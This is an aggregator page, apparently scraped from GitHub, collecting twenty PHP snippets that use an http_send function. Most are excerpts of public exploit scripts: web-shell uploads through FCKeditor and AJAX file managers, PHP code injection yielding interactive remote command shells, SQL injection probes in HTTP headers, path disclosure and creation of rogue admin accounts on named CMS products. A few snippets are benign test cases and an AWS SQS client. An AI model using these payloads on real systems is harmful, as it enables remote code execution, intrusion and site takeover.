本文整理汇总了PHP中http_send函数的典型用法代码示例。如果您正苦于以下问题:PHP http_send函数的具体用法?PHP http_send怎么用?PHP http_send使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了http_send函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的PHP代码示例。
示例1: upload
function upload()
{
global $host, $path;
$connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext) {
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\\((.*),'(.*)'\\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) {
die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
}
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) {
return $ext;
}
sleep(1);
}
return false;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:33,代码来源:5922.php
示例2: execute
protected function execute()
{
$post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@\".dirname(__FILE__).\"/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat\"}";
$postParam = json_decode($post, true);
$data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
$res = "{\"errno\":0}";
$this->assert_json(__LINE__, $data, $res);
}
开发者ID:sdgdsffdsfff,项目名称:stplatform,代码行数:8,代码来源:case_1411824180.php
示例3: execute
protected function execute()
{
$post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@/home/map/apps/servertest/lighttpd/htdocs/mysite/application/controllers/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat\"}";
$postParam = json_decode($post, true);
$data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
$res = "{\"errno\":0}";
$this->assert_json(__LINE__, $data, $res);
}
开发者ID:sdgdsffdsfff,项目名称:stplatform,代码行数:8,代码来源:case_1411823716.php
示例4: execute
protected function execute()
{
$post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@" . dirname(__FILE__) . "/20130913100335.dat\"}";
$postParam = json_decode($post, true);
$data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
$res = "{\"errno\":0}";
$this->assert_json(__LINE__, $data, $res);
}
开发者ID:sdgdsffdsfff,项目名称:stplatform,代码行数:8,代码来源:case_1415104050.php
示例5: check_query
function check_query($sql)
{
global $host, $path;
$packet = "GET {$path} HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$sql} \r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n\r\n";
$html = http_send($host, $packet);
return preg_match("/DENIED/", $html) ? true : false;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:11,代码来源:4798.php
示例6: get_path
function get_path()
{
global $host, $path;
$packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) {
die("\n[-] Path not found!\n");
}
return $m[1];
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:11,代码来源:19573.php
示例7: get_path
function get_path()
{
global $host, $path;
$packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/in <b>(.*)<\\/b> on/i", http_send($host, $packet), $found);
$ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo")));
$ret .= substr($path, 1);
return $ret;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:11,代码来源:4879.php
示例8: sqs_client_enqueue
function sqs_client_enqueue($data, $config)
{
$result = array();
$err = '';
$variables = array();
$variables['Action'] = 'SendMessage';
$variables['MessageBody'] = json_encode($data);
$variables['Version'] = '2012-11-05';
$parsed_url = parse_url($config['sqs_queue_url']);
$headers = array();
$headers['Host'] = strtolower($parsed_url['host']);
$headers['X-Amz-Date'] = gmdate(DATE_FORMAT_ISO8601_BASIC);
$signature = __sqs_client_version_four($config['aws_secret_access_key'], $config['sqs_queue_url'], $variables, $headers, $config['s3_region'], 'post');
$region = empty($config['sqs_region']) ? empty($config['s3_region']) ? 'us-east-1' : $config['s3_region'] : $config['sqs_region'];
// fallback to same region as s3 bucket
$date_str = substr($headers['X-Amz-Date'], 0, 8);
$headers['Authorization'] = "AWS4-HMAC-SHA256 Credential={$config['aws_access_key_id']}/{$date_str}/{$region}/sqs/aws4_request, SignedHeaders=host;x-amz-date, Signature={$signature}";
$post_result = http_send($config['sqs_queue_url'], $variables, $headers);
$data = $post_result['result'];
if ($data && $config['log_api_response']) {
log_file("sqs response:\n" . print_r($data, 1), $config);
}
if ($post_result['error']) {
$err = 'Could not make sqs request ' . $config['sqs_queue_url'] . ' ' . $post_result['error'];
} else {
if (!$data) {
$err = 'Got no response from sqs request';
} else {
$xml = @simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NOENT);
if (!is_object($xml)) {
$err = 'Could not parse sqs response';
} else {
if (sizeof($xml->Error)) {
if (!$config['log_api_response']) {
log_file("sqs response:\n" . $data, $config);
}
$err = 'Got error in sqs response';
} else {
if (!(is_object($xml->SendMessageResult) && is_object($xml->SendMessageResult->MessageId))) {
$err = 'Got no MessageId in sqs response';
} else {
$result['id'] = (string) $xml->SendMessageResult->MessageId;
}
}
}
}
}
if ($err) {
$result['error'] = $err;
}
return $result;
}
开发者ID:joshuacox,项目名称:angular-moviemasher,代码行数:52,代码来源:sqs.php
示例9: check_query
function check_query($sql)
{
global $host, $path;
$payload = "gb_name=null&gb_email=foo%40bar.com&task=insert";
$packet = "POST {$path}index.php?option=guestbook HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Via: {$sql}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
return !preg_match("/UNION\\/\\*\\*\\/SELECT/", http_send($host, $packet));
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:5391.php
示例10: inject_code
function inject_code()
{
global $host, $path;
$code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
$payload = "p_user={$code}&p_pass=";
$packet = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet);
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:8649.php
示例11: inject_php
function inject_php()
{
global $host, $path, $user, $pass;
$data = "feed_order=\"]));}print('<<');passthru(base64_decode(\$_SERVER[HTTP_CMD]));print('>>');%23";
$packet = "POST {$path}set-prefs.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: user_name={$user}; user_password_hash={$pass}\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
if (preg_match("/login.php/", http_send($host, $packet))) {
die("\n[-] Incorrect username or password!\n");
}
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:15,代码来源:17911.php
示例12: login
function login()
{
global $host, $path, $username, $password;
$data = "user={$username}&pass={$password}&submit=1&request_uri=foo";
$packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
$pattern = "/pass=" . md5($password) . "/";
return preg_match($pattern, http_send($host, $packet));
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:5653.php
示例13: check_target
function check_target()
{
global $host, $path, $prefix;
print "\n[-] Checking {$host}...";
$packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) {
print "vulnerable!\n";
} else {
die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
}
$prefix = $match[1];
}
开发者ID:iusky,项目名称:fullypwnd,代码行数:14,代码来源:6005.php
示例14: check_target
function check_target()
{
// see if MySQL version is >= 4.1 (subqueries support) or other error
global $host, $path;
print "\n[-] Checking {$host}...";
$pck = "GET " . $path . "new_images.php?order=id,(SELECT/**/1) HTTP/1.1\r\n";
$pck .= "Host: " . $host . "\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
$buff = http_send($host, $pck);
if (!strpos($buff, "The LinPHA developers")) {
die("\n\n[-] Error... Probably wrong MySQL version!\n");
} else {
print " OK!\n";
}
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:16,代码来源:4242.php
示例15: strlen
print "\n+------------------------------------------------------------+\n";
if ($argc < 5) {
print "\nUsage......: php {$argv['0']} <host> <path> <username> <password>\n";
print "\nExample....: php {$argv['0']} localhost / user pass";
print "\nExample....: php {$argv['0']} localhost /dolphin/ user pass\n";
die;
}
$host = $argv[1];
$path = $argv[2];
$payload = "ID={$argv[3]}&Password={$argv[4]}";
$packet = "POST {$path}member.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) {
die("\n[-] Login failed!\n");
}
$phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])";
$packet = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
print "\ndolphin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") {
break;
}
preg_match("/\r\n\r\n(.*)\\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:31,代码来源:17994.php
示例16: random_mkdir
function random_mkdir()
{
global $host, $path, $fileman, $rootdir;
$dirname = uniqid();
$payload = "new_folder={$dirname}¤tFolderPath={$rootdir}";
$packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
return $dirname;
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:13,代码来源:18111.php
示例17: stream_get_contents
return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------+";
print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------+\n";
if ($argc < 3) {
print "\nUsage......: php {$argv['0']} <host> <path>\n";
print "\nExample....: php {$argv['0']} localhost /";
print "\nExample....: php {$argv['0']} localhost /aidicms/\n";
die;
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
print "\naidicms-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") {
break;
}
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:31,代码来源:18085.php
示例18: strlen
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
sleep(2);
print "Granting admin privileges for user [ {$newuser} ]\n";
$headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n";
preg_match_all('/php\\?u=(\\d+)/', http_recv(http_send($host, 80, $headers)), $matches);
if (!is_numeric(max($matches[1]))) {
die('Failed.');
}
sleep(2);
$payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=" . urlencode('Save Changes');
$headers = "POST {$path}admin/edit/index.php?u=" . max($matches[1]) . " HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
print "Success!\n\n";
print "http://{$host}{$path}login.php\n";
print "user: {$newuser}\n";
print "pass: {$newpass}\n";
?>
#
### [ dun / 2012 ] ###############################
开发者ID:sasukeuni,项目名称:Python-Exploit-Search-Tool,代码行数:30,代码来源:20762.php
示例19: set_NowritableServer
function set_NowritableServer()
{
global $host, $path, $prefix, $pwd;
// we need to set $NowritableServer=1 in /option/php-stats_mode.php
$s1 = "/con scrittura di files sul Server/";
$s2 = "/the write files on server mode/";
$pck = "GET {$path}admin.php?action=preferenze HTTP/1.1\r\n";
$pck .= "Host: {$host}\r\n";
$pck .= "Cookie: pass_cookie={$pwd}\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
$html = http_send($host, $pck);
if (preg_match($s1, $html) || preg_match($s2, $html)) {
$data = "change_mode=1";
$pck = "POST {$path}admin.php HTTP/1.1\r\n";
$pck .= "Host: {$host}\r\n";
$pck .= "Content-Type: application/x-www-form-urlencoded\r\n";
$pck .= "Content-Length: " . strlen($data) . "\r\n";
$pck .= "Keep-Alive: 300\r\n";
$pck .= "Connection: keep-alive\r\n\r\n";
$pck .= $data;
http_send($host, $pck);
}
}
开发者ID:SuperQcheng,项目名称:exploit-database,代码行数:24,代码来源:4513.php
示例20: preg_match
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) {
die("\n[-] Upload failed! (Error {$html[1]})\n");
} else {
print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
}
define(STDIN, fopen("php://stdin", "r"));
while (1) {
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit") {
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
$packet .= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) {
die("\n[-] Exploit failed...\n");
}
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
} else {
break;
}
}
?>
# milw0rm.com [2008-05-29]
开发者ID:noscripter,项目名称:exploit-database,代码行数:30,代码来源:5697.php
注:本文中的http_send函数示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
请发表评论